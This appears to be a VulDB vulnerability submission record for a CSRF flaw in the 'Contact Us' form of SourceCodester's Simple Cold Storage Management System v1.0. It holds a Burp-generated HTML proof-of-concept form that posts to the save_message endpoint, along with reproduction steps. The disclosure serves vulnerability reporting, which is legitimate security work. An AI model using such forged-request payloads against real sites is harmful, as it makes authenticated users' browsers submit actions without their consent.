| 제목 | Simple Cold Storage Management System - CSRF in Contact Us form |
|---|
| 설명 | # Exploit Title: Simple Cold Storage Management System v1.0 - CSRF in "Contact Us"
# Exploit Author: Sourav Kumar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:It is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated. CSRF attacks exploit the trust a Web application has in an authenticated user.
Vulnerable Parameters:
Contact Us
Payload:
'
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/csms/classes/Master.php?f=save_message" method="POST" enctype="multipart/form-data">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="as" />
<input type="hidden" name="contact" value="885665" />
<input type="hidden" name="email" value="kittukumar267@gmail.com" />
<input type="hidden" name="message" value="seht" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Steps:
1) Go to Contact us page - http://localhost/csms/?page=contact_us
2) Now fill the form
3) Now intercept the post request with burp suite
4) Then Generate CSRF Payload PoC
5) Open the HTML Payload in browser
6) You will receive this message {"status":"success","msg":"Your message has successfully sent."}
|
|---|
| 원천 | ⚠️ https://github.com/souravkr529/CSRF-in-Cold-Storage-Management-System/blob/main/PoC |
|---|
| 사용자 | Sourav529 (UID 33985) |
|---|
| 제출 | 2022. 10. 18. AM 11:14 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 10. 18. AM 11:42 (28 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 211194 [SourceCodester Simple Cold Storage Management System 1.0 Contact Us /csms/?page=contact_us 교차 사이트 요청 위조] |
|---|
| 포인트들 | 20 |
|---|